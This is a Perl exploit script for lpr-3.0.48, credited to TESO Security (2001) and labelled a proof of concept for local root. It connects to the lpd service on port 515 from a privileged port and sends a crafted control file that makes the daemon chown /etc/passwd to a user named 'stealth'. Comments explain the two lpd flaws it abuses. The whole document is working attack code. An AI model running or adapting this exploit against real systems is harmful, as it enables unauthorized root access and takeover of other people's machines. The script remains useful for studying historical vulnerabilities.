blob: cad1ae08d2909258f46aadf4eea3907eb861dbc2 (
plain)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
|
#!/usr/bin/perl -w
# 7350lapsus
#
# lpr-3.0.48 Local root exploit.
# requires root on a host counted in
# hosts.lpd and local account on lpd box.
# This is proof of concept, chown()ing /etc/passwd
# to a user named 'stealth'.
#
# (C) COPYRIGHT TESO Security, 2001
# All Rights Reserved
#
# May be used under the terms of the GPL.
#
use IO::Socket;
sub recvack
{
my $ack;
$_[0]->recv($ack, 1);
if ($ack ne "\0") {
print "Some ACK-error occured.\n";
exit;
}
}
$rem = shift;
if (!defined($rem)) {
print "$0 <hostname>\n"; exit;
}
# Open connection
for ($i = 721; $i <= 731 && !defined $peer; ++$i) {
$peer = IO::Socket::INET->new(PeerAddr => $rem,
PeerPort => 515,
LocalPort => $i,
Proto => "tcp",
Type => SOCK_STREAM);
}
die "$!" if (!defined($peer));
print "Bound to port $i\n";
print $peer "\2lp\n";
recvack($peer);
$payload = "Pstealth\na/etc/passwd\n";
$l = length($payload);
# First bug in lpd: allows to create files in /
# with length up to 5 chars
print $peer "\x02$l /foo\n";
recvack($peer);
# This one is incredible. it trusts controlfiles
# input to chown ANY file on system to user.
print $peer $payload;
print $peer "\0";
recvack($peer);
close $peer;
|
